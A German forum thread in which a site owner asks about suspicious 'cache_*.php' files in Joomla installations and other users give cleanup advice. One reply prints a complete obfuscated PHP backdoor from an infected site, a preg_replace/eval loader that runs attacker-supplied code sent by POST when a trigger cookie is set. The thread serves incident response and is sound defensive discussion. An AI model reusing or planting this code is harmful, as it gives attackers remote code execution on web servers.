cache_aXXXXXX.php Datei - Gefahr oder Joomlazubehör?

  • Hallo,


    mein Provider (Strato) hat in meinen Joomla Installationen (3.8x) die Anwesenheit von php-Dateien moniert, z.B.

    /media/system/images/mooRainbow/cache_aba3d42969.php

    /templates/protostar/language/en-GB/cache_a8f88ad2cb.php

    /administrator/components/com_login/models/cache_ae8599646a.php

    /libraries/joomla/observer/updater/cache_aba1a6880a.php

    /administrator/templates/hathor/html/com_content/featured/cache_a5b89dab46.php

    und weitere.

    Der Adminbereich ist bei mir über eine .htaccess-Sperre geblockt.


    Kann mir jemand diese Dateien erklären? Vielen Dank im Voraus.


  • Hallo Kitepascal,


    in der Datei "/administrator/components/com_jce/adapters/cache_a7fa2cdfa6.php" befindet sich:


    <?php $cookey = "a7fa2cdfa6"; preg_replace("\x23\50\x2e\53\x29\43\x69\145","\x40\145\x76\141\x6c\50\x22\134\x31\42\x29\73","\x40\145\x76\141\x6c\50\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65\50\x22\141\x57\131\x67\113\x47\154\x7a\143\x32\126\x30\113\x43\122\x66\122\x30\126\x55\127\x79\112\x6a\142\x32\71\x72\141\x57\125\x69\130\x53\153\x70\111\x48\163\x67\132\x57\116\x6f\142\x79\101\x69\131\x32\71\x76\141\x32\154\x6c\120\x54\121\x69\117\x79\102\x70\132\x69\101\x6f\141\x58\116\x7a\132\x58\121\x6f\112\x46\71\x51\124\x31\116\x55\127\x79\122\x6a\142\x32\71\x72\132\x58\154\x64\113\x53\153\x67\121\x47\126\x32\131\x57\167\x6f\131\x6d\106\x7a\132\x54\131\x30\130\x32\122\x6c\131\x32\71\x6b\132\x53\147\x6b\130\x31\102\x50\125\x31\122\x62\112\x47\116\x76\142\x32\164\x6c\145\x56\60\x70\113\x54\163\x67\132\x58\150\x70\144\x44\163\x67\146\x51\75\x3d\42\x29\51\x3b"); ?>


    Ein Problem mit einer veränderten .htaccess ist mir nicht bekannt.

  • Danke kitepascal,


    ich hatte die Datei auch mal an "https://www.virustotal.com/de/" gesendet zum prüfen, die haben hier keine Unregelmäßigkeiten festgestellt.thinking


    Wie ist deine Erfahrung? Wenn ich diese "cache_aXXXX.php" Dateien entferne, sollte hier noch etwas beachtet werden?

    Was mich stutzig macht: Ich habe den Admin-Bereich per IP.htaccess gesperrt, wie kommt dann dergleichen Schadsoftware in diesen Bereich?

  • Die Frage ist, wie der Schadcode in die Installation gelangen konnte. Die Auflistung von Strato garantiert keine Vollständigkeit, es gibt sicher noch mehr Schaddateien oder manipulierte Core-Dateien. Die Installation muss komplett in Datei- und Verzeichnisebene genau untersucht werden, damit sie nicht weiter kompromittiert wird.


    Meistens befindet sich eine Shell, das ist vereinfacht ausgedrückt ein Dateiexplorer und Editor, mit dem beliebig Dateien hochgeladen oder manipuliert werden können, in einer infizierten Installation. Auf dieser Ebene spielen passwortgeschützte Bereiche keine Rolle.


    Eine idiotensichere Anleitung für eine Bereinigung gibt es nicht, zudem sich die Muster der meisten Angriffe erheblich voneinander unterscheiden. Falls du dir das nicht zutraust, die Installation komplett zu bereinigen, solltest du dir professionelle Hilfe suchen. Ist trotz des Aufwands nicht unbedingt teuer, die Erfahrenen wissen, was sie tun.


    Ansonsten kannst du die Inhalte zB mit j2xml exportieren, das Verzeichnis /images nach dem Löschen aller PHP Dateien in ihm sichern, und die Seite mit einer neuen Installation aufbauen. Danach unbedingt die infizierte Installation vom Webspace nehmen.

  • Vor dem Löschen solltest du dir das Änderungsdatum dieser Dateien anschauen, um so eventuelle weitere Schaddateien ausfindig zu machen, indem du dir sämtliche Dateien sortiert nach Datum anschaust.


    Auch wäre ein Blick in die Access Logs der letzten 6 Wochen sinnvoll, um erkennen zu können, ob es in letzter Zeit Zugriffe auf Backdoors gab.


    Strato -> Datenbanken und Webspace -> Statistik -> Logfiles

    Dann das Anfangsdatum des Auswertungszeitraums so weit wie möglich zurück setzen.


    Die .gz Datei könntest du für eine übersichtliche Auswertung hier hochladen.